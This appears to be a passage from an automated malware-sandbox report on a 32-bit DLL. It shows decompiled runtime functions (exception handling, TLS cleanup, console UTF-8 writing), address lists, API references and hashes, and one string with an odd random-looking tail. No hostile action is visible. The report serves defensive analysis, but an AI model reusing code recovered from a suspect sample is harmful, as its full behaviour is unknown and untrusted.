																						if(_t258 != 0) {
																							break;
																						}
																						_t330 = _t330 - 1;
																						_t318 = _t318 + 4;
																						__eflags = _t330;
																						if(_t330 > 0) {
																							continue;
																						} else {
																							_t298 = _v20;
																							_t257 = _v24;
																							_t303 = _v40;
																							goto L40;
																						}
																						goto L43;
																					}
																					_push(_a24);
																					_push(_v28);
																					E6ECDF676(_t303, _t274, _a8, _v8, _a16, _a20,  &_v84,  *_t318,  &_v104, _a28, _a32);
																					_t335 = _t335 + 0x30;
																				}
																				L43:
																				_t300 = _v16;
																				goto L44;
																				L40:
																				_t298 = _t298 + 1;
																				_t257 = _t257 + 0x10;
																				_v20 = _t298;
																				_v24 = _t257;
																				__eflags = _t298 - _v92;
																			} while (_t298 != _v92);
																			goto L43;
																		}
																	}
																}
																L44:
																_t300 = _t300 + 1;
																_t250 = _v44;
																_t294 = _v32 + 0x14;
																_v16 = _t300;
																_v32 = _t294;
																__eflags = _t300 - _v56;
															} while (_t300 < _v56);
															_t305 = _a20;
															_t319 = _a32;
														}
													}
													__eflags = _a24;
													if(__eflags != 0) {
														_push(1);
														E6ECDF131(_t274, _t305, _t319, __eflags);
														_t279 = _t274;
													}
													__eflags = ( *_t305 & 0x1fffffff) - 0x19930521;
													if(( *_t305 & 0x1fffffff) < 0x19930521) {
														L59:
														_t225 = E6ECDF3B1(_t274, _t279, _t300, _t305, _t319);
														__eflags =  *(_t225 + 0x1c);
														if( *(_t225 + 0x1c) != 0) {
															goto L66;
														} else {
															goto L60;
														}
													} else {
														__eflags = _t305[7];
														if(_t305[7] != 0) {
															L52:
															_t229 = _t305[8] >> 2;
															__eflags = _t229 & 0x00000001;
															if((_t229 & 0x00000001) == 0) {
																_push(_t305[7]);
																_t230 = E6ECE0105(_t274, _t305, _t319, _t274);
																_pop(_t279);
																__eflags = _t230;
																if(_t230 == 0) {
																	goto L63;
																} else {
																	goto L59;
																}
															} else {
																 *(E6ECDF3B1(_t274, _t279, _t300, _t305, _t319) + 0x10) = _t274;
																_t238 = E6ECDF3B1(_t274, _t279, _t300, _t305, _t319);
																_t290 = _v8;
																 *((intOrPtr*)(_t238 + 0x14)) = _v8;
																goto L61;
															}
														} else {
															_t245 = _t305[8] >> 2;
															__eflags = _t245 & 0x00000001;
															if((_t245 & 0x00000001) == 0) {
																goto L59;
															} else {
																__eflags = _a28;
																if(_a28 != 0) {
																	goto L59;
																} else {
																	goto L52;
																}
															}
														}
													}
												} else {
													__eflags = _t274[0x14] - 0x19930521;
													if(_t274[0x14] == 0x19930521) {
														goto L29;
													} else {
														__eflags = _t274[0x14] - 0x19930522;
														if(_t274[0x14] != 0x19930522) {
															goto L56;
														} else {
															goto L29;
														}
													}
												}
											}
										}
									} else {
										_v16 =  *((intOrPtr*)(E6ECDF3B1(_t274, _t279, _t300, _t305, _t319) + 0x1c));
										_t268 = E6ECDF3B1(_t274, _t279, _t300, _t305, _t319);
										_push(_v16);
										 *(_t268 + 0x1c) = _t319;
										_t269 = E6ECE0105(_t274, _t305, _t319, _t274);
										_pop(_t290);
										if(_t269 != 0) {
											goto L23;
										} else {
											_t305 = _v16;
											_t356 =  *_t305 - _t319;
											if( *_t305 <= _t319) {
												L61:
												E6ECE1BCC(_t274, _t290, _t300, _t305, _t319, __eflags);
											} else {
												while(1) {
													_t290 =  *((intOrPtr*)(_t319 + _t305[1] + 4));
													if(E6ECDFD99( *((intOrPtr*)(_t319 + _t305[1] + 4)), _t356, 0x6ed1e0c0) != 0) {
														goto L62;
													}
													_t319 = _t319 + 0x10;
													_t273 = _v20 + 1;
													_v20 = _t273;
													_t356 = _t273 -  *_t305;
													if(_t273 >=  *_t305) {
														goto L61;
													} else {
														continue;
													}
													goto L62;
												}
											}
											L62:
											_push(1);
											_push(_t274);
											E6ECDF131(_t274, _t305, _t319, __eflags);
											_t279 =  &_v64;
											E6ECDFD81( &_v64);
											E6ECDE95C( &_v64, 0x6ed1b17c);
											L63:
											 *(E6ECDF3B1(_t274, _t279, _t300, _t305, _t319) + 0x10) = _t274;
											_t232 = E6ECDF3B1(_t274, _t279, _t300, _t305, _t319);
											_t279 = _v8;
											 *(_t232 + 0x14) = _v8;
											__eflags = _t319;
											if(_t319 == 0) {
												_t319 = _a8;
											}
											E6ECDED1D(_t279, _t319, _t274);
											E6ECE0005(_a8, _a16, _t305);
											_t235 = E6ECE01C2(_t305);
											_t335 = _t335 + 0x10;
											_push(_t235);
											E6ECDFF7C(_t274, _t279, _t300, _t305, _t319, __eflags);
											goto L66;
										}
									}
								}
							}
						}
					}
				}
			}

0x6ecdf6f6
0x6ecdf6fd
0x6ecdf6ff
0x6ecdf708
0x6ecdf70e
0x6ecdf716
0x6ecdf718
0x6ecdf71b
0x6ecdf721
0x6ecdfa9a
0x6ecdfa9a
0x6ecdfa9f
0x6ecdfaa1
0x6ecdfaa3
0x6ecdfaa6
0x6ecdfaa7
0x6ecdfaaa
0x6ecdfab0
0x6ecdfbcf
0x6ecdfab6
0x6ecdfab6
0x6ecdfab7
0x6ecdfab8
0x6ecdfabf
0x6ecdfac2
0x6ecdfac5
0x6ecdfacb
0x6ecdfacd
0x6ecdfad2
0x6ecdfad5
0x6ecdfad7
0x6ecdfadd
0x6ecdfadf
0x6ecdfae5
0x6ecdfafa
0x6ecdfaff
0x6ecdfb02
0x6ecdfb04
0x6ecdfbcb
0x00000000
0x6ecdfbcc
0x6ecdfb04
0x6ecdfae5
0x6ecdfadd
0x6ecdfad5
0x6ecdfb0a
0x6ecdfb0d
0x6ecdfb10
0x6ecdfb13
0x6ecdfb16
0x6ecdfb1c
0x6ecdfb2e
0x6ecdfb33
0x6ecdfb36
0x6ecdfb39
0x6ecdfb3c
0x6ecdfb3f
0x6ecdfb42
0x6ecdfb45
0x00000000
0x00000000
0x6ecdfb4b
0x6ecdfb4b
0x6ecdfb4e
0x6ecdfb51
0x6ecdfb60
0x6ecdfb61
0x6ecdfb61
0x6ecdfb63
0x6ecdfb66
0x00000000
0x00000000
0x6ecdfb68
0x6ecdfb6b
0x00000000
0x00000000
0x6ecdfb79
0x6ecdfb7b
0x6ecdfb7e
0x6ecdfb80
0x6ecdfb88
0x6ecdfb88
0x6ecdfb8b
0x6ecdfb8d
0x6ecdfb8f
0x6ecdfbab
0x6ecdfbb0
0x6ecdfbb3
0x6ecdfbb3
0x00000000
0x6ecdfb8b
0x6ecdfb82
0x6ecdfb86
0x00000000
0x00000000
0x00000000
0x6ecdfbb6
0x6ecdfbb9
0x6ecdfbba
0x6ecdfbbd
0x6ecdfbc0
0x6ecdfbc3
0x6ecdfbc6
0x6ecdfbc6
0x00000000
0x6ecdfb51
0x6ecdfbd0
0x6ecdfbd5
0x6ecdfbd6
0x6ecdfbd9
0x6ecdfbdc
0x6ecdfbdd
0x6ecdfbde
0x6ecdfbdf
0x6ecdfbe2
0x6ecdfbe4
0x6ecdfc5c
0x6ecdfc5e
0x6ecdfc5e
0x6ecdfbe6
0x6ecdfbe6
0x6ecdfbe9
0x6ecdfbec
0x00000000
0x6ecdfbee
0x6ecdfbee
0x6ecdfbf1
0x6ecdfbf4
0x6ecdfbfb
0x6ecdfbfb
0x6ecdfbfe
0x6ecdfc00
0x6ecdfc02
0x6ecdfc34
0x6ecdfc34
0x6ecdfc37
0x6ecdfc3e
0x6ecdfc3e
0x6ecdfc41
0x6ecdfc44
0x6ecdfc4b
0x6ecdfc4b
0x6ecdfc4e
0x6ecdfc55
0x6ecdfc57
0x6ecdfc57
0x6ecdfc50
0x6ecdfc50
0x6ecdfc53
0x00000000
0x00000000
0x6ecdfc53
0x6ecdfc46
0x6ecdfc46
0x6ecdfc49
0x00000000
0x00000000
0x6ecdfc49
0x6ecdfc39
0x6ecdfc39
0x6ecdfc3c
0x00000000
0x00000000
0x6ecdfc3c
0x6ecdfc58
0x6ecdfc04
0x6ecdfc04
0x6ecdfc04
0x6ecdfc07
0x6ecdfc07
0x6ecdfc09
0x6ecdfc0b
0x00000000
0x00000000
0x6ecdfc0d
0x6ecdfc0f
0x6ecdfc23
0x6ecdfc23
0x6ecdfc11
0x6ecdfc11
0x6ecdfc14
0x6ecdfc17
0x00000000
0x6ecdfc19
0x6ecdfc19
0x6ecdfc1c
0x6ecdfc1f
0x6ecdfc21
0x00000000
0x00000000
0x00000000
0x00000000
0x6ecdfc21
0x6ecdfc17
0x6ecdfc2c
0x6ecdfc2c
0x6ecdfc2e
0x00000000
0x6ecdfc30
0x6ecdfc30
0x6ecdfc30
0x00000000
0x6ecdfc2e
0x6ecdfc27
0x6ecdfc29
0x6ecdfc29
0x00000000
0x6ecdfc29
0x6ecdfbf6
0x6ecdfbf6
0x6ecdfbf9
0x00000000
0x00000000
0x00000000
0x00000000
0x6ecdfbf9
0x6ecdfbf4
0x6ecdfbec
0x6ecdfc5f
0x6ecdfc63
0x6ecdfc63
0x6ecdf730
0x6ecdf730
0x6ecdf739
0x6ecdf836
0x6ecdf836
0x6ecdf839
0x00000000
0x6ecdf768
0x6ecdf768
0x6ecdf76d
0x00000000
0x6ecdf773
0x6ecdf773
0x6ecdf77b
0x6ecdfa34
0x6ecdfa38
0x6ecdf781
0x6ecdf786
0x6ecdf789
0x6ecdf78e
0x6ecdf795
0x6ecdf79a
0x00000000
0x6ecdf7d2
0x6ecdf7da
0x6ecdf83e
0x6ecdf83e
0x6ecdf841
0x6ecdf844
0x6ecdf846
0x6ecdf849
0x6ecdf84c
0x6ecdf852
0x6ecdfa03
0x6ecdfa03
0x6ecdfa06
0x00000000
0x6ecdfa08
0x6ecdfa08
0x6ecdfa0b
0x00000000
0x6ecdfa11
0x6ecdfa11
0x6ecdfa14
0x6ecdfa17
0x6ecdfa18
0x6ecdfa19
0x6ecdfa1c
0x6ecdfa1d
0x6ecdfa20
0x6ecdfa21
0x6ecdfa26
0x00000000
0x6ecdfa26
0x6ecdfa0b
0x6ecdf858
0x6ecdf858
0x6ecdf85c
0x00000000
0x6ecdf862
0x6ecdf862
0x6ecdf869
0x6ecdf881
0x6ecdf881
0x6ecdf884
0x6ecdf887
0x6ecdf88d
0x6ecdf89d
0x6ecdf8a2
0x6ecdf8a5
0x6ecdf8a8
0x6ecdf8ab
0x6ecdf8ae
0x6ecdf8b1
0x6ecdf8b4
0x6ecdf8ba
0x6ecdf8ba
0x6ecdf8bd
0x6ecdf8c0
0x6ecdf8cf
0x6ecdf8d0
0x6ecdf8d0
0x6ecdf8d2
0x6ecdf8d5
0x6ecdf8db
0x6ecdf8de
0x6ecdf8e4
0x6ecdf8e6
0x6ecdf8e9
0x6ecdf8ec
0x6ecdf8f5
0x6ecdf8f8
0x6ecdf8fa
0x6ecdf8fa
0x6ecdf8fd
0x6ecdf900
0x6ecdf903
0x6ecdf906
0x6ecdf909
0x6ecdf90e
0x6ecdf90f
0x6ecdf910
0x6ecdf911
0x6ecdf912
0x6ecdf915
0x6ecdf917
0x6ecdf919
0x00000000
0x6ecdf91b
0x6ecdf91b
0x6ecdf91b
0x6ecdf91e
0x6ecdf921
0x6ecdf923
0x6ecdf924
0x6ecdf929
0x6ecdf92c
0x6ecdf92e
0x00000000
0x00000000
0x6ecdf930
0x6ecdf931
0x6ecdf934
0x6ecdf936
0x00000000
0x6ecdf938
0x6ecdf938
0x6ecdf93b
0x6ecdf93e
0x00000000
0x6ecdf93e
0x00000000
0x6ecdf936
0x6ecdf952
0x6ecdf958
0x6ecdf975
0x6ecdf97a
0x6ecdf97a
0x6ecdf97d
0x6ecdf97d
0x00000000
0x6ecdf941
0x6ecdf941
0x6ecdf942
0x6ecdf945
0x6ecdf948
0x6ecdf94b
0x6ecdf94b
0x00000000
0x6ecdf950
0x6ecdf8ec
0x6ecdf8de
0x6ecdf980
0x6ecdf983
0x6ecdf984
0x6ecdf987
0x6ecdf98a
0x6ecdf98d
0x6ecdf990
0x6ecdf990
0x6ecdf999
0x6ecdf99c
0x6ecdf99c
0x6ecdf8b4
0x6ecdf99f
0x6ecdf9a3
0x6ecdf9a5
0x6ecdf9a8
0x6ecdf9ae
0x6ecdf9ae
0x6ecdf9b6
0x6ecdf9bb
0x6ecdfa29
0x6ecdfa29
0x6ecdfa2e
0x6ecdfa32
0x00000000
0x00000000
0x00000000
0x00000000
0x6ecdf9bd
0x6ecdf9bd
0x6ecdf9c1
0x6ecdf9d3
0x6ecdf9d6
0x6ecdf9d9
0x6ecdf9db
0x6ecdf9f2
0x6ecdf9f6
0x6ecdf9fc
0x6ecdf9fd
0x6ecdf9ff
0x00000000
0x6ecdfa01
0x00000000
0x6ecdfa01
0x6ecdf9dd
0x6ecdf9e2
0x6ecdf9e5
0x6ecdf9ea
0x6ecdf9ed
0x00000000
0x6ecdf9ed
0x6ecdf9c3
0x6ecdf9c6
0x6ecdf9c9
0x6ecdf9cb
0x00000000
0x6ecdf9cd
0x6ecdf9cd
0x6ecdf9d1
0x00000000
0x00000000
0x00000000
0x00000000
0x6ecdf9d1
0x6ecdf9cb
0x6ecdf9c1
0x6ecdf86b
0x6ecdf86b
0x6ecdf872
0x00000000
0x6ecdf874
0x6ecdf874
0x6ecdf87b
0x00000000
0x00000000
0x00000000
0x00000000
0x6ecdf87b
0x6ecdf872
0x6ecdf869
0x6ecdf85c
0x6ecdf7dc
0x6ecdf7e4
0x6ecdf7e7
0x6ecdf7ec
0x6ecdf7f0
0x6ecdf7f3
0x6ecdf7f9
0x6ecdf7fc
0x00000000
0x6ecdf7fe
0x6ecdf7fe
0x6ecdf801
0x6ecdf803
0x6ecdfa39
0x6ecdfa39
0x00000000
0x6ecdf809
0x6ecdf811
0x6ecdf81c
0x00000000
0x00000000
0x6ecdf825
0x6ecdf828
0x6ecdf829
0x6ecdf82c
0x6ecdf82e
0x00000000
0x6ecdf834
0x00000000
0x6ecdf834
0x00000000
0x6ecdf82e
0x6ecdf809
0x6ecdfa3e
0x6ecdfa3e
0x6ecdfa40
0x6ecdfa41
0x6ecdfa48
0x6ecdfa4b
0x6ecdfa59
0x6ecdfa5e
0x6ecdfa63
0x6ecdfa66
0x6ecdfa6b
0x6ecdfa6e
0x6ecdfa71
0x6ecdfa73
0x6ecdfa75
0x6ecdfa75
0x6ecdfa7a
0x6ecdfa86
0x6ecdfa8c
0x6ecdfa91
0x6ecdfa94
0x6ecdfa95
0x00000000
0x6ecdfa95
0x6ecdf7fc
0x6ecdf7da
0x6ecdf79a
0x6ecdf77b
0x6ecdf76d
0x6ecdf739

APIs

IsInExceptionSpec.LIBVCRUNTIME ref: 6ECDF7F3
type_info::operator==.LIBVCRUNTIME ref: 6ECDF815
___TypeMatch.LIBVCRUNTIME ref: 6ECDF924
IsInExceptionSpec.LIBVCRUNTIME ref: 6ECDF9F6
_UnwindNestedFrames.LIBCMT ref: 6ECDFA7A
CallUnexpected.LIBVCRUNTIME ref: 6ECDFA95

Strings

csm, xrefs: 6ECDF7A0
csm, xrefs: 6ECDF733
csm, xrefs: 6ECDF84C

Memory Dump Source

Source File: 00000000.00000002.601171889.000000006ECC1000.00000020.00020000.sdmp, Offset: 6ECC0000, based on PE: true

Associated: 00000000.00000002.601163946.000000006ECC0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601193192.000000006ECEA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601219117.000000006ED1D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.601225755.000000006ED1F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.601231937.000000006ED20000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ecc0000_loaddll32.jbxd

Similarity

API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 2123188842-393685449
Opcode ID: 6b83ebf2a301ef97858b9de953cb718f4bb8e379d1e048fc688a96df8fa8d150
Instruction ID: 90327d15834b4337df600115f6f20db28ab2dbf03372a606a32c8f3d07b363e9
Opcode Fuzzy Hash: 6b83ebf2a301ef97858b9de953cb718f4bb8e379d1e048fc688a96df8fa8d150
Instruction Fuzzy Hash: 90B17C31C0028AEFCF05CFE4C8909DEB7B9FF04314B25455AEA146B219E732DA69CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6ECCC340, Relevance: 12.6, APIs: 10, Instructions: 125
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E6ECCC340() {
				intOrPtr _t25;
				intOrPtr _t26;
				void* _t27;
				void* _t28;
				void* _t29;
				void* _t30;
				void* _t31;
				signed char _t42;
				signed char _t43;
				signed char _t44;
				signed char _t45;
				intOrPtr* _t52;
				intOrPtr* _t53;
				intOrPtr* _t54;
				intOrPtr* _t55;
				intOrPtr* _t56;
				void* _t57;

				_t25 =  *((intOrPtr*)(_t57 + 0x18));
				if(_t25 == 3 || _t25 == 0) {
					_t52 =  *0x6ed1e12c; // 0x0
					if(_t52 == 0) {
						goto L26;
					}
					_t42 = 0;
					do {
						_t27 = TlsGetValue( *(_t52 + 4));
						if(_t27 != 0) {
							TlsSetValue( *(_t52 + 4), 0);
							 *_t52(_t27);
							_t57 = _t57 + 4;
							_t42 = 1;
						}
						_t52 =  *((intOrPtr*)(_t52 + 8));
					} while (_t52 != 0);
					if((_t42 & 0x00000001) == 0) {
						goto L26;
					}
					_t53 =  *0x6ed1e12c; // 0x0
					if(_t53 == 0) {
						goto L26;
					}
					_t43 = 0;
					do {
						_t28 = TlsGetValue( *(_t53 + 4));
						if(_t28 != 0) {
							TlsSetValue( *(_t53 + 4), 0);
							 *_t53(_t28);
							_t57 = _t57 + 4;
							_t43 = 1;
						}
						_t53 =  *((intOrPtr*)(_t53 + 8));
					} while (_t53 != 0);
					if((_t43 & 0x00000001) == 0) {
						goto L26;
					}
					_t54 =  *0x6ed1e12c; // 0x0
					if(_t54 == 0) {
						goto L26;
					}
					_t44 = 0;
					do {
						_t29 = TlsGetValue( *(_t54 + 4));
						if(_t29 != 0) {
							TlsSetValue( *(_t54 + 4), 0);
							 *_t54(_t29);
							_t57 = _t57 + 4;
							_t44 = 1;
						}
						_t54 =  *((intOrPtr*)(_t54 + 8));
					} while (_t54 != 0);
					if((_t44 & 0x00000001) == 0) {
						goto L26;
					}
					_t55 =  *0x6ed1e12c; // 0x0
					if(_t55 == 0) {
						goto L26;
					}
					_t45 = 0;
					do {
						_t30 = TlsGetValue( *(_t55 + 4));
						if(_t30 != 0) {
							TlsSetValue( *(_t55 + 4), 0);
							 *_t55(_t30);
							_t57 = _t57 + 4;
							_t45 = 1;
						}
						_t55 =  *((intOrPtr*)(_t55 + 8));
					} while (_t55 != 0);
					if((_t45 & 0x00000001) != 0) {
						_t56 =  *0x6ed1e12c; // 0x0
						while(_t56 != 0) {
							_t31 = TlsGetValue( *(_t56 + 4));
							if(_t31 != 0) {
								TlsSetValue( *(_t56 + 4), 0);
								 *_t56(_t31);
								_t57 = _t57 + 4;
							}
							_t56 =  *((intOrPtr*)(_t56 + 8));
						}
					}
					goto L26;
				} else {
					L26:
					_t26 =  *0x6ed1a300; // 0x70
					return _t26;
				}
			}

0x6eccc344
0x6eccc34b
0x6eccc355
0x6eccc35d
0x00000000
0x00000000
0x6eccc369
0x6eccc377
0x6eccc37a
0x6eccc37e
0x6eccc387
0x6eccc38e
0x6eccc391
0x6eccc394
0x6eccc394
0x6eccc370
0x6eccc373
0x6eccc39b
0x00000000
0x00000000
0x6eccc3a1
0x6eccc3a9
0x00000000
0x00000000
0x6eccc3af
0x6eccc3c7
0x6eccc3ca
0x6eccc3ce
0x6eccc3d7
0x6eccc3de
0x6eccc3e1
0x6eccc3e4
0x6eccc3e4
0x6eccc3c0
0x6eccc3c3
0x6eccc3eb
0x00000000
0x00000000
0x6eccc3f1
0x6eccc3f9
0x00000000
0x00000000
0x6eccc3fb
0x6eccc407
0x6eccc40a
0x6eccc40e
0x6eccc417
0x6eccc41e
0x6eccc421
0x6eccc424
0x6eccc424
0x6eccc400
0x6eccc403
0x6eccc42b
0x00000000
0x00000000
0x6eccc42d
0x6eccc435
0x00000000
0x00000000
0x6eccc437
0x6eccc447
0x6eccc44a
0x6eccc44e
0x6eccc457
0x6eccc45e
0x6eccc461
0x6eccc464
0x6eccc464
0x6eccc440
0x6eccc443
0x6eccc46b
0x6eccc479
0x6eccc484
0x6eccc48b
0x6eccc48f
0x6eccc498
0x6eccc49f
0x6eccc4a2
0x6eccc4a2
0x6eccc481
0x6eccc481
0x6eccc484
0x00000000
0x6eccc46d
0x6eccc46d
0x6eccc46d
0x6eccc476
0x6eccc476

APIs

TlsGetValue.KERNEL32(?), ref: 6ECCC37A
TlsSetValue.KERNEL32(?,00000000), ref: 6ECCC387
TlsGetValue.KERNEL32(?), ref: 6ECCC3CA
TlsSetValue.KERNEL32(?,00000000), ref: 6ECCC3D7
TlsGetValue.KERNEL32(?), ref: 6ECCC40A
TlsSetValue.KERNEL32(?,00000000), ref: 6ECCC417
TlsGetValue.KERNEL32(?), ref: 6ECCC44A
TlsSetValue.KERNEL32(?,00000000), ref: 6ECCC457
TlsGetValue.KERNEL32(?), ref: 6ECCC48B
TlsSetValue.KERNEL32(?,00000000), ref: 6ECCC498

Memory Dump Source

Source File: 00000000.00000002.601171889.000000006ECC1000.00000020.00020000.sdmp, Offset: 6ECC0000, based on PE: true

Associated: 00000000.00000002.601163946.000000006ECC0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601193192.000000006ECEA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601219117.000000006ED1D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.601225755.000000006ED1F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.601231937.000000006ED20000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ecc0000_loaddll32.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 46438d9506b83ca277d5ef0db6585b971bb1f636982df3c308e047d7e4602273
Instruction ID: 8abc2a03e81ac51a85d32ae86b432406f72cb9cfc7fc5f56d9450629f1462e85
Opcode Fuzzy Hash: 46438d9506b83ca277d5ef0db6585b971bb1f636982df3c308e047d7e4602273
Instruction Fuzzy Hash: 78417F32144249EFDB50EFE59D12FFA3724AF12E41F048024EE254E259F761DA22DB93

Uniqueness

Uniqueness Score: -1.00%

Function 6ECD1BF0, Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 212
fileCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E6ECD1BF0(void* __ebx, struct _OVERLAPPED** __ecx, void* __edx, void* __edi, void* __ebp, signed char _a4, signed char* _a8) {
				char _v20;
				void* _v24;
				char _v44;
				long _v48;
				void* _v52;
				signed int _v56;
				char _v60;
				void* __esi;
				long _t57;
				void* _t58;
				long _t60;
				signed int _t61;
				long _t81;
				signed int _t86;
				signed int _t87;
				signed int _t88;
				signed int _t91;
				char _t93;
				void* _t96;
				void* _t97;
				signed int _t100;
				signed int _t101;
				struct _OVERLAPPED* _t102;
				signed int _t105;
				signed int* _t106;
				signed int _t110;
				signed char _t112;
				void* _t114;
				long _t118;
				void** _t119;
				void* _t120;
				long _t122;
				void* _t125;
				void* _t133;
				struct _OVERLAPPED** _t135;
				void* _t144;
				long _t152;
				signed char* _t155;
				DWORD* _t156;
				void* _t157;
				void** _t158;
				void** _t160;

				_push(__ebp);
				_push(__ebx);
				_push(__edi);
				_t158 = _t157 - 0x30;
				_t152 = _a4;
				_t135 = __ecx;
				if(_t152 == 0) {
					 *(__ecx + 4) = 0;
					goto L5;
				} else {
					_t96 = __edx;
					_t58 = GetStdHandle(0xfffffff4);
					if(_t58 == 0) {
						_t57 = 6;
						goto L7;
					} else {
						_t133 = _t58;
						if(_t58 != 0xffffffff) {
							_v48 = 0;
							_t60 = GetConsoleMode(_t133,  &_v48);
							__eflags = _t60;
							if(_t60 == 0) {
								__eflags = _t133;
								if(__eflags == 0) {
									goto L42;
								} else {
									_v48 = 0;
									_t81 = WriteFile(_t133, _t96, _t152,  &_v48, 0);
									__eflags = _t81;
									if(_t81 == 0) {
										_t57 = GetLastError();
										_t102 = 0;
										__eflags = 0;
										_t122 = 1;
									} else {
										_t102 = _v48;
										_t57 = 0;
										_t122 = 0;
									}
									 *_t135 = _t122;
									_t135[1] = _t102;
									_t135[2] = _t57;
									goto L9;
								}
							} else {
								_t57 = _a8[4] & 0x000000ff;
								__eflags = _t57;
								if(_t57 == 0) {
									__eflags = _t152 - 0x1000;
									_t84 =  <  ? _t152 : 0x1000;
									_push( <  ? _t152 : 0x1000);
									E6ECC3650( &_v60, _t96);
									_t158 =  &(_t158[1]);
									__eflags = _v60 - 1;
									if(_v60 != 1) {
										_t86 = _v56;
										_t97 = _v52;
										goto L28;
									} else {
										__eflags = _v56;
										if(_v56 == 0) {
											_t87 =  *_t96 & 0x000000ff;
											_t38 = _t87 + 0x6ed0f570; // 0x1010101
											_t105 =  *_t38 & 0x000000ff;
											__eflags = _t105 - 2;
											if(_t105 < 2) {
												L39:
												_t135[2] = 0x6ed108cc;
												_t135[1] = 0x1502;
												goto L40;
											} else {
												__eflags = _t105 - _t152;
												if(_t105 <= _t152) {
													goto L39;
												} else {
													_t106 = _a8;
													 *_t106 = _t87;
													_t106[1] = 1;
													goto L38;
												}
											}
											goto L9;
										} else {
											_t88 = _v56;
											__eflags = _t88 - _t152;
											if(__eflags > 0) {
												_t100 = _t88;
												_t118 = _t152;
												_push(0x6ed10904);
												goto L45;
											} else {
												_t125 = _t96;
												_push(_t88);
												E6ECC3650( &_v48, _t125);
												_t158 =  &(_t158[1]);
												_t86 = E6ECD2730(_t96,  &_v48, _t133, _t135);
												_t97 = _t125;
												L28:
												_push(_t97);
												_push(_t86);
												_t57 = E6ECD2470(_t97, _t135, _t133, _t133, _t135);
												_t158 =  &(_t158[2]);
												goto L9;
											}
										}
									}
								} else {
									__eflags = _t57 - 4;
									if(_t57 >= 4) {
										E6ECE99A0("Unexpected number of bytes for incomplete UTF-8 codepoint.C:hblnvdkuwjldwqihlnxtdgmpotoebajfmrqgmtnnutixvbqajdevcxgcqgdhsiilwcvdkgzorjjpjapcqyybtuxulzftbxrvddihohqaoiyqfmhasplljpbebhbcelwx", 0x3a, 0x6ed1086c);
										_t158 =  &(_t158[1]);
										asm("ud2");
										L42:
										_t61 = E6ECE94E0(_t96,  &M6ED0FBBA, 0x23, _t133, _t135, __eflags, 0x6ed0fc64);
										_t158 =  &(_t158[1]);
										asm("ud2");
										goto L43;
									} else {
										_t110 =  *_t96;
										_t155 = _a8;
										__eflags = (_t110 & 0x000000c0) - 0x80;
										if((_t110 & 0x000000c0) != 0x80) {
											_a4 = 0;
											goto L24;
										} else {
											_t155[_t57] = _t110;
											_t112 = _a4 + 1;
											_a4 = _t112;
											_t57 =  *_t155 & 0x000000ff;
											_t96 =  *(_t57 + 0x6ed0f570) & 0x000000ff;
											__eflags = _t96 - _t112;
											_v24 = _t96;
											if(_t96 <= _t112) {
												_t61 = _t112 & 0x000000ff;
												__eflags = _t112 - 5;
												if(__eflags >= 0) {
													L43:
													_t100 = _t61;
													_t118 = 4;
													_push(0x6ed108d4);
													L45:
													E6ECE9470(_t96, _t100, _t118, _t133, _t135, __eflags);
													_t160 =  &(_t158[1]);
													asm("ud2");
													goto L46;
												} else {
													_push(_t61);
													_t57 = E6ECC3650( &_v60, _t155);
													_t158 =  &(_t158[1]);
													__eflags = _v60 - 1;
													_a4 = 0;
													if(_v60 == 1) {
														L24:
														_t135[2] = 0x6ed108cc;
														_t135[1] = 0x1502;
														goto L8;
													} else {
														_t114 = _v52;
														_t91 = _v56;
														__eflags = _t114 - _t96;
														 *_t158 = _t114;
														if(_t114 != _t96) {
															L46:
															_t101 =  &_v24;
															_t119 = _t160;
															_v48 = 0;
															_push(0x6ed108e4);
															_push( &_v48);
															goto L48;
														} else {
															_t156 =  &_v48;
															_push(_t96);
															_push(_t91);
															E6ECD2470(_t96, _t156, _t133, _t133, _t135);
															_t160 =  &(_t158[2]);
															__eflags = _v48 - 1;
															if(_v48 != 1) {
																_t93 = _v44;
																 *_t160 = _t96;
																__eflags = _t93 - _t96;
																_v20 = _t93;
																if(_t93 != _t96) {
																	_t101 =  &_v20;
																	_t119 = _t160;
																	_v48 = 0;
																	_push(0x6ed108f4);
																	_push(_t156);
																	L48:
																	E6ECE9AB0(_t96, _t101, _t119, _t133);
																	asm("ud2");
																	L50();
																	_t120 = _t135;
																	__eflags = _t101 - 0x46a;
																	if(_t101 > 0x46a) {
																		__eflags = _t101 - 0x271c;
																		if(_t101 <= 0x271c) {
																			__eflags = _t101 - 0x1715;
																			if(_t101 > 0x1715) {
																				__eflags = _t101 - 0x1f4d;
																				if(_t101 > 0x1f4d) {
																					__eflags = _t101 - 0x1f4e;
																					if(_t101 == 0x1f4e) {
																						goto L93;
																					} else {
																						__eflags = _t101 - 0x2022;
																						if(_t101 == 0x2022) {
																							goto L93;
																						} else {
																							__eflags = _t101 - 0x25e9;
																							if(_t101 != 0x25e9) {
																								goto L106;
																							} else {
																								goto L93;
																							}
																						}
																					}
																				} else {
																					__eflags = _t101 - 0x1716;
																					if(_t101 == 0x1716) {
																						goto L93;
																					} else {
																						__eflags = _t101 - 0x1b64;
																						if(_t101 == 0x1b64) {
																							goto L93;
																						} else {
																							__eflags = _t101 - 0x1b80;
																							if(_t101 == 0x1b80) {
																								goto L93;
																							} else {
																								goto L106;
																							}
																						}
																					}
																				}
																			} else {
																				__eflags = _t101 - 0x4cf;
																				if(_t101 > 0x4cf) {
																					__eflags = _t101 - 0x4d0;
																					if(_t101 == 0x4d0) {
																						return 4;
																					} else {
																						__eflags = _t101 - 0x50f;
																						if(_t101 == 0x50f) {
																							return 0x1a;
																						} else {
																							__eflags = _t101 - 0x5b4;
